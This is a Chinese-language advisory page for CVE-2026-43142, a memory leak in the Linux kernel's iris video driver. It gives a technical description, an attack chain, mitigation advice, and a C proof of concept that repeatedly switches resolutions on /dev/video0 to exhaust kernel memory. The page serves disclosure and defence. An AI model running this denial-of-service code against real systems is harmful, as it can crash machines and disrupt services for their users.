CVE-2026-43142 CVSS 5.5 中危

CVE-2026-43142 Linux内核内存泄漏漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43142

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的iris视频驱动组件存在内存泄漏漏洞。当固件释放内部缓冲区后，驱动程序未能正确销毁这些缓冲区，导致不再使用的陈旧分配持续占用内存。这种情况在分辨率切换场景下尤为严重，导致内存资源被大量浪费，直到会话结束。本地低权限攻击者可利用此漏洞造成拒绝服务。

技术细节

该漏洞源于Linux内核media: iris: gen1驱动在处理固件释放响应时的逻辑缺陷。具体而言，当视频处理会话中发生分辨率变化时，驱动会根据新的分辨率要求分配新的内部缓冲区。然而，在接收到固件释放旧缓冲区的响应后，驱动程序未执行销毁操作，导致旧缓冲区仍然保留在内核内存中。随着分辨率切换操作的频繁进行，这些未释放的内存块不断累积，最终耗尽可用的内核内存资源。由于攻击向量为本地且权限要求较低，恶意用户可以通过编写特定程序反复触发分辨率切换，导致内存耗尽（OOM），从而使系统崩溃或服务不可用。

攻击链分析

STEP 1

访问获取

攻击者获取本地低权限用户访问权限。

STEP 2

触发漏洞

攻击者运行恶意程序，针对受损的iris驱动设备节点重复执行分辨率切换操作。

STEP 3

资源耗尽

驱动程序在每次切换时泄漏内部缓冲区内存，导致系统可用内存逐渐减少。

STEP 4

拒绝服务

最终导致内核内存耗尽，触发OOM Killer，使系统崩溃或关键服务停止响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43142: Linux Kernel Iris Driver Memory Leak
 * This PoC attempts to trigger the memory leak by repeatedly changing
 * the resolution/format of the video device.
 * Compilation: gcc -o poc_leak poc_leak.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/videodev2.h>

#define DEVICE "/dev/video0" // Assuming iris driver is registered here
#define ITERATIONS 10000

int main() {
    int fd = -1;
    struct v4l2_format fmt;
    int i;

    fd = open(DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    printf("Starting resolution change loop to trigger leak...\n");

    for (i = 0; i < ITERATIONS; i++) {
        // Toggle between two resolutions to force buffer reallocation
        // Resolution A
        fmt.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
        fmt.fmt.pix_mp.width = 1920;
        fmt.fmt.pix_mp.height = 1080;
        fmt.fmt.pix_mp.pixelformat = V4L2_PIX_FMT_NV12;
        ioctl(fd, VIDIOC_S_FMT, &fmt);

        // Resolution B
        fmt.fmt.pix_mp.width = 1280;
        fmt.fmt.pix_mp.height = 720;
        ioctl(fd, VIDIOC_S_FMT, &fmt);

        if (i % 100 == 0) {
            printf("Iteration %d\n", i);
        }
    }

    close(fd);
    printf("PoC execution completed. Check kernel memory usage.\n");
    return 0;
}

影响范围

Linux Kernel (Specific versions including iris driver before patch)

防御指南

临时缓解措施

限制对视频设备节点的访问权限，仅允许受信任的用户或应用程序访问。监控系统的内核内存使用情况，一旦发现异常增长应及时排查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表